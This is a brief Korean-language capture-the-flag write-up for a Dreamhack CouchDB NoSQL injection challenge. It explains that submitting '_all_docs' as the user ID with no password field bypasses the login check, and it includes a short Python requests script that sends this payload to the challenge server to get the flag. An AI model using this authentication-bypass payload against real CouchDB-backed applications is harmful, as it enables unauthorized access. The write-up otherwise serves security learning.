NoSQL
Couch DB Injection
NoSQL인 CouchDB를 이용한 문제다
admin계정으로 접속하거나, 아니면 단순히 로그인만 성공해도 되는 문제같다
couch DB에도 informationschema
같은 특수 구성요소가 존재한다
_all_docs
를 이용하여 로그인을 시도해보자
해당 요소를 사용하면 upw
는 undefined
가 된다
즉, upw를 payload에 담지 않으면 된다
import requests
url = "http://host3.dreamhack.games:10124/auth"
data = {'uid':'_all_docs'}
res = requests.post(url, data=data)
print(res.text)
uid
를 _all_docs
로 설정해서 보내주면
flag가 출력된다